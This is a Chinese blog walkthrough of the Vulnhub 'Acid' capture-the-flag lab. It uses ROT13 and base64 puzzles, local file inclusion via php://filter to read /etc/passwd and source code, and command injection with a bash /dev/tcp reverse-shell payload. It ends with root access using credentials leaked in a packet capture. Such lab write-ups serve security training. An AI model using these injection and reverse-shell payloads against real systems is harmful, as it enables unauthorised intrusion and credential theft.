[Vulnhub] Acid ROT13+LFI+RCE+Pcapng信息泄露权限提升

最新推荐文章于 2024-08-29 20:58:07 发布
最新推荐文章于 2024-08-29 20:58:07 发布
阅读量354 收藏 4
点赞数 3
分类专栏: Vulnhub 文章标签: 网络
Whoami? Martin
本文链接:https://blog.csdn.net/qq_51886509/article/details/140672660
版权

信息收集

IP AddressOpening Ports
192.168.101.157TCP:33447

$ nmap -p- 192.168.101.157 --min-rate 1000 -sC -sV 

PORT      STATE SERVICE VERSION
33447/tcp open  http    Apache httpd 2.4.10 ((Ubuntu))
|_http-title: /Challenge
|_http-server-header: Apache/2.4.10 (Ubuntu)

本地权限

image.png

$ gobuster dir -u "http://192.168.101.157:33447" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -x .php

image-1.png

http://192.168.101.157:33447/Challenge/

image-2.png

image-4.png

$ echo "gkg.qvpn" | tr 'A-Za-z' 'N-ZA-Mn-za-m'|rev

image-5.png

http://192.168.101.157:33447/Challenge/acid.txt

image-6.png

Google搜索如何构建一个安全的PHP登录界面

image-7.png

Username : test_user Email : test@example.com Password : 6ZaxN2Vzm9NUJT2y

image-8.png

http://192.168.101.157:33447/Challenge/include.php

image-9.png

LFI

$ curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=/etc/passwd" | sed '/<!DOCTYPE html>/,$d'

image-10.png

0x5933566a4c6e4a34626e413d

image-11.png

$ echo "5933566a4c6e4a34626e413d" | xxd -r -p |base64 -d | tr 'A-Za-z' 'N-ZA-Mn-za-m'|rev

进行十六进制解码后base64解码再进行ROT13解码再倒序

image-12.png

$ curl http://192.168.101.157:33447/Challenge/cake.php

image-13.png

$ curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=cake.php"

image-14.png

$ echo 'PD9waHAKaW5jbHVkZV9vbmNlICdpbmNsdWRlcy9kYl9jb25uZWN0LnBocCc7CmluY2x1ZGVfb25jZSAnaW5jbHVkZXMvZnVuY3Rpb25zLnBocCc7Cj8+CgoKCjwhRE9DVFlQRSBodG1sPgo8aHRtbD4KICAgIDxoZWFkPgogICAgICAgIDxtZXRhIGNoYXJzZXQ9IlVURi04Ij4KICAgICAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9ImNzcy9zdHlsZS5jc3MiPgogICAgICAgIDxsaW5rIHJlbD0ic3R5bGVzaGVldCIgaHJlZj0ic3R5bGVzL21haW4uY3NzIiAvPgogICAgICAgIDx0aXRsZT4vTWFnaWNfQm94PC90aXRsZT4KICAgIDwvaGVhZD4KICAgIDxib2R5PgogICAgICAgICA8ZGl2IGNsYXNzPSJ3cmFwcGVyIj4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CiAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxoMT48Zm9udCBjb2xvcj0nUmVkJz5BaC5oYWFuLi4uLlRoZXJlIGlzIGxvbmcgd2F5IHRvIGdvLi5kdWRlIDotKTwvaDE+PC9mb250Pjxicj48Zm9udCBjb2xvcj0nR3JlZW4nPlBsZWFzZSA8YSBocmVmPSJpbmRleC5waHAiPmxvZ2luPC9hPjwvZiQKICAgIDwvYm9keT4KPC9odG1sPgo8P3BocAoKLyogQ29tZSBvbi4uLi5jYXRjaCB0aGlzIGZpbGUgInRhaWxzLnBocCIgKi8KPz4K'|base64 -d

image-15.png

http://192.168.101.157:33447/Challenge/Magic_Box/tails.php

image-16.png

$ curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=./Magic_Box/tails.php"

image-17.png

$ echo 'PD9waHAKaW5jbHVkZV9vbmNlICcuLi9pbmNsdWRlcy9kYl9jb25uZWN0LnBocCc7CmluY2x1ZGVfb25jZSAnLi4vaW5jbHVkZXMvZnVuY3Rpb25zLnBocCc7CnNlY19zZXNzaW9uX3N0YXJ0KCk7CgppZiAobG9naW5fY2hlY2soJG15c3FsaSkgPT0gdHJ1ZSkgewogICAgJGxvZ2dlZCA9ICdpbic7Cn0gZWxzZSB7CiAgICAkbG9nZ2VkID0gJ291dCc7Cn0KPz4KPCFET0NUWVBFIGh0bWw+CjxodG1sPgogICAgPGhlYWQ+CiAgICAgICAgPHRpdGxlPkl0cyBNYWdpYzwvdGl0bGU+CiAgICAgICAgPGxpbmsgcmVsPSJzdHlsZXNoZWV0IiBocmVmPSIuLi9jc3Mvc3R5bGUuY3NzIj4KICAgICAgICA8bGluayByZWw9InN0eWxlc2hlZXQiIGhyZWY9Ii4uL3N0eWxlcy9tYWluLmNzcyIgLz4KICAgICAgICA8c2NyaXB0IHR5cGU9InRleHQvSmF2YVNjcmlwdCIgc3JjPSJqcy9zaGE1MTIuanMiPjwvc2NyaXB0PiAKICAgICAgICA8c2NyaXB0IHR5cGU9InRleHQvSmF2YVNjcmlwdCIgc3JjPSJqcy9mb3Jtcy5qcyI+PC9zY3JpcHQ+IAoKICAgIDwvaGVhZD4KICAgIDxib2R5PgogICAgICAgICA8ZGl2IGNsYXNzPSJ3cmFwcGVyIj4KICAgICAgICAgICAgICAgIDxkaXYgY2xhc3M9ImNvbnRhaW5lciI+CgkJCTxoMT5JIGFtIGltcHJlc3NlZCBieSB5b3VyIGhhY2tpbmcgc2tpbGxzLjwvaDE+CgkJIDxmb3JtICBhY3Rpb249InByb2MvdmFsaWRhdGUucGhwIiBtZXRob2Q9InBvc3QiIG5hbWU9ImxvZ2luX2Zvcm0iPgogICAgICAgICAgICAgICAgT3BlbiB5b3VyIE1hZ2ljYWwgRG9vcnM6IDxpbnB1dCB0eXBlPSJ0ZXh0IiBwbGFjZWhvbGRlcj0iRW50ZXIgU2VjcmV0IEtleSIgbmFtZT0iZW1haWwiIG1heGxlbmd0aD0iMjAiIC8+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0ic3VibWl0IiB2YWx1ZT0iQXV0aGVudGljYXRlIiBvbmNsaWNrPSJmb3JtaGFzaCh0aGlzLmZvcm0sIHRoaXMuZm9ybS5wYXNzd29yZCk7IiAvPiAKICAgICAgICAgICAgICAgIDwvZm9ybT4KICAgICAgICAgICAgICAgIDwvZGl2PgogICAgICAgICAgICAgICAgPHVsIGNsYXNzPSJiZy1idWJibGVzIj4KICAgICAgICAgICAgICAgIDxsaT48L2xpPgogICAgICAgICAgICAgICAgPGxpPjwvbGk+CiAgICAgICAgICAgICAgICA8bGk+PC9saT4KICAgICAgICAgICAgICAgIDxsaT48L2xpPgogICAgICAgICAgICAgICAgPGxpPjwvbGk+CiAgICAgICAgICAgICAgICA8bGk+PC9saT4KICAgICAgICAgICAgICAgIDxsaT48L2xpPgogICAgICAgICAgICAgICAgPGxpPjwvbGk+CiAgICAgICAgICAgICAgICA8L3VsPgogICAgICAgIDwvZGl2PgogICAgICAgIDxzY3JpcHQgc3JjPSdodHRwOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2pxdWVyeS8yLjEuMy9qcXVlcnkubWluLmpzJz48L3NjcmlwdD4KCiAgICAgICAgPHNjcmlwdCBzcmM9ImpzL2luZGV4LmpzIj48L3NjcmlwdD4KICA8L2JvZHk+CjwvaHRtbD4KCgo='|base64 -d

image-18.png

$ curl -s -b "sec_session_id=fond9djuoectbjelegus91rdi3" "http://192.168.101.157:33447/Challenge/include.php?add=Extract+File&file=php://filter/convert.base64-encode/resource=./Magic_Box/proc/validate.php"

image-19.png

$ echo 'PD9waHAKCmluY2x1ZGVfb25jZSAnLi4vLi4vaW5jbHVkZXMvZGJfY29ubmVjdC5waHAnOwppbmNsdWRlX29uY2UgJy4uLy4uL2luY2x1ZGVzL2Z1bmN0aW9ucy5waHAnOwoKc2VjX3Nlc3Npb25fc3RhcnQoKTsKCmlmIChpc3NldCgkX1BPU1RbJ2VtYWlsJ10pKSB7Cgkka2V5ID0gJF9QT1NUWydlbWFpbCddOwoJJGtleTEgPSAiNjM0MjUiOwoJaWYgKCRrZXkgPT0gJGtleTEpewoJaGVhZGVyKCJMb2NhdGlvbjogLi4vY29tbWFuZC5waHAiKTsKCWV4aXQoKTsKICAgICAgICB9CgllbHNlIHsKCWhlYWRlcigiTG9jYXRpb246Li4vLi4vaW5kZXgucGhwP2Vycm9yPTEiKTsKCWV4aXQoKTsKCX0KfQplbHNlIHsKCWhlYWRlcigiTG9jYXRpb246IC4uLy4uL2Vycm9yLnBocD9lcnI9Q291bGQgbm90IHByb2Nlc3MgYXV0aGVudGljYXRpb24iKTsKCWV4aXQoKTsKfQo/PgoKCg=='|base64 -d

image-20.png

key:63425

image-21.png

RCE

$ curl -X POST -d "IP=;ls&submit=submit" http://192.168.101.157:33447/Challenge/Magic_Box/command.php

image-22.png

$ curl -X POST -d "IP=;/bin/bash -c 'bash%20%3E%26%2Fdev%2Ftcp%2F192.168.101.128%2F10032%200%3E%261'"+"&submit=submit" http://192.168.101.157:33447/Challenge/Magic_Box/command.php

image-23.png

权限提升

$ find / -type f -name *.pcap* 2>/tmp/null

image-24.png

www-data@acid:/sbin/raw_vs_isi$ cp /sbin/raw_vs_isi/hint.pcapng /tmp

www-data@acid:/tmp$ python3 -m http.server 9999

image-25.png

$ wget http://192.168.101.157:9999/hint.pcapng

image-26.png

$ tshark -r hint.pcapng -qz follow,tcp,ascii,0

image-27.png

username:saman
password:1337hax0r

$ su saman

$ sudo /bin/bash

$ cat /root/flag.txt

image-28.png

Acid@Makke@Hax0r

Мартин.
关注
  • 3
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
python rot13解密_用Python实现的rot13编解码
weixin_39546520的博客
03-01 1451
本文最后更新于2015年8月2日,已超过 1 年没有更新,如果文章内容失效,还请反馈给我,谢谢!#一目了然版def rot13(s):result = ""for v in s:c = ord(v)if c >= ord('a') and c <= ord('z'):if c > ord('m'):c -= 13else:c += 13elif c >= ord('A') ...
Rot13加密
大喵爱吃鱼的博客
10-17 4352
目录 一、简介 二、算法原理 三、举例 四、加密算法实现 五、特点 一、简介 Rot13是一种简易的替换式加密算法,也称为回转13位,最早是用于英文网站上用于隐藏八卦、妙句或者脏话的工具。 二、算法原理 原理上来说是对26个小写字母以及26个大写字母进行操作,对原有字母的ASCII值 + 13或者ASCII-13,然后找到计算后的ASCII值对应的字母。通过这样的规则将一个...
rot13+base+md5等密码的基本了解
m0re's blog
02-11 1268
rot13密码 套用ROT13到一段文字上仅仅只需要检查字元字母顺序并取代它在13位之后的对应字母,有需要超过时则重新绕回26英文字母开头即可。A换成N、B换成O、依此类推到M换成Z,然后序列反转:N换成A、O换成B、最后Z换成M。只有这些出现在英文字母里头的字元受影响;数字、符号、空白字元以及所有其他字元都不变。不过它好像凯撒密码的变形版,凯撒密码是将明文的字母向后移动三位的到密文: 凯撒密码...
VulnHub渗透测试实战靶场 - ACID: SERVER
LYJ20010728的博客
08-05 870
VulnHub渗透测试实战靶场 - ACID: SERVER环境下载ACID: SERVER靶机搭建渗透测试信息收集漏洞挖掘getshell提权 环境下载 戳此进行环境下载 ACID: SERVER靶机搭建 将下载好的靶机环境,导入VMware,将其网络适配设置为NAT模式,运行即可 渗透测试 信息收集 使用Kali自带的工具netdiscover进行子网探测:sudo netdiscover -r 192.168.246.0/24 用Nmap对获取到的靶机IP地址进行扫描:sudo n
python rot13,Python文本加密:rot13
weixin_35916239的博客
03-25 1013
你有麻烦了。如果您的字符在字母表的后半部分,它将是空的,因为i+13将偏离末尾。有几种方法可以修复它。在最简单的方法是简单地将字母表字符串加倍(字面意思是:alph = alph * 2)。这意味着您最多可以访问52个值,而不仅仅是26个值。不过,这是一个相当粗糙的解决方案,最好是修复索引。在一个更好的选择是从索引中减去13,而不是加上13。Rot13是对称的,因此两者都有相同的效果,并且它可以工...
python rot13解密_ROT13 加密与解密
weixin_39725885的博客
12-10 1238
ROT13简介:ROT13(回转13位)是一种简易的替换式密码算法。它是一种在英文网络论坛用作隐藏八卦、妙句、谜题解答以及某些脏话的工具,目的是逃过版主或管理员的匆匆一瞥。ROT13 也是过去在古罗马开发的凯撒密码的一种变体。ROT13是它自身的逆反,即:要还原成原文只要使用同一算法即可得,故同样的操作可用于加密与解密。该算法并没有提供真正密码学上的保全,故它不应该被用于需要保全的用途上。它常常被...
python rot13解密_codewars(python)练习笔记二十:ROT13解密
weixin_42112658的博客
02-09 1248
codewars(python)练习笔记二十:ROT13解密题目How can you tell an extrovert from an introvert at NSA? Va gur ryringbef, gur rkgebireg ybbxf ng gur BGURE thl'f fubrf.I found this joke on USENET, but the punchline is...
ROT13加密
qq_1300258993的博客
10-03 1653
ROT13: 是建在 UNIX 系统上的简单的加密程序,它也是简单的代替密码。在这种密码 中, A 被 N 代替, B 被 O 代替等等,每一个字母是环移 13 所对应的字母。 用 ROT13 加密文件两遍便恢复出原始的文件: P=ROT13ROT13 ( P )) ROT13 并非为保密而设计的,它经常用在互联网 Vsenet 电子邮件中隐藏特定的内容, 以避免泄露一个难题的解答等等。...
CTF ROT13加密原理
boboyu1224的博客
05-29 2041
问题 ROT13(回转13位)是一种简易的替换式密码算法。它是一种在英文网络论坛用作隐藏八卦、妙句、谜题解答以及某些脏话的工具,目的是逃过版主或管理员的匆匆一瞥。ROT13 也是过去在古罗马开发的凯撒密码的一种变体。ROT13是它自身的逆反,即:要还原成原文只要使用同一算法即可得,故同样的操作可用于加密与解密。该算法并没有提供真正密码学上的保全,故它不应该被用于需要保全的用途上。它常常被当作弱加密...
Rot13_Decoder:解码Rot13密码。 Rot13是可以旋转13位的替换密码
05-29
本项目“Rot13_Decoder”专注于解码使用Rot13算法加密的文本,它是由JavaScript编写的,因此我们可以深入探讨这个编程语言以及Rot13编码的工作原理。 Rot13( Rotate by 13 places)是一种对称加密方法,它通过将...
易语言字符串rot13算法
07-21
在易语言中,字符串处理是常见的编程任务之一,而ROT13则是一种简单的字符替换加密算法,常用于隐藏文本,但安全性较低。在这里,我们将深入探讨易语言如何实现字符串的ROT13算法,并结合源码来理解其工作原理。 ...
rot13加解密工具
06-12
Rot13是一种简单但有趣的信息隐藏方法,它在某些场景下被用作基础的加密手段。本工具专为处理rot13加密的数据而设计,对于理解和解决CTF中的相关谜题大有帮助。 **一、Rot13 简介** Rot13,全称“ Rotate by 13 ...
rot13译码器「rot13 decoder」-crx插件
03-08
就地rot13解码器。 解码网页中的rot13。 只需选择文本,单击鼠标右键,然后从菜单中选择Rot13。 翻译会直接显示在页面中,而不显示在弹出框中。 这将保留所有格式,包括段落分隔符,文本样式和链接。 或者在发布之前...
ROT13翻译器「ROT13 Translator」-crx插件
03-22
简单的ROT13翻译器。 普通和简单的ROT13编码器/解码器。 使用弹出窗口。 在您输入时翻译。 支持语言:English (United States)
浏览器发送HTTP请求的过程
学Python的小白!
08-25 1506
浏览器发送HTTP请求的过程是一个复杂但有序的步骤,‌主要包括以下几个阶段:‌1.构建请求,2.查找缓存、3.DNS解析、4.建立TCP连接、5.发送HTTP请求、6.服务器处理请求、7.服务器发送响应、8.客户端处理响应、9.关闭连接。
Linux高性能服务器编程 总结索引 | 第2章:IP协议详解
最新发布
AsherGu的博客
08-29 422
IP服务的特点;IPv4头部结构;IP分片;IP路由:IP模块工作流程,路由机制,路由表更新;IP转发;重定向;IPv6头部结构:IPv6固定头部结构,IPv6扩展头部
服务器远程管理
m0_64827698的博客
08-26 643
SSH两种级别的安全认证:基于口令(口令在网络上传播,易受中间人攻击),基于密钥(传公钥,公钥是否相同,公钥加密质询,私钥解密)(密钥不在网络上传)2.启用服务services.msc(telnet)/配置远程桌面服务gpedit.msc(rdp)/使⽤SSH,你可以把所有传输的数据进⾏加密,这样“中间 ⼈”这种攻击⽅式就不可能实现了。实验总结:在windows开启telnet服务(2019不支持),RDP服务,SSH。SSH协议允许⽤户通过配置⽂件⾃定义选择加密算法,以优化安全性和性能。
如何将十六进制的乱码转换成汉字
2401_85258690的博客
08-28 335
可以看出,接收到的报文第一行包含了我们想要的信息,我们需要将。在TCP通信时,抓包得到的请求报文,我们需要对其进行分析,中心思想为:剔除%,用strtol将16进制乱码进行转换。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值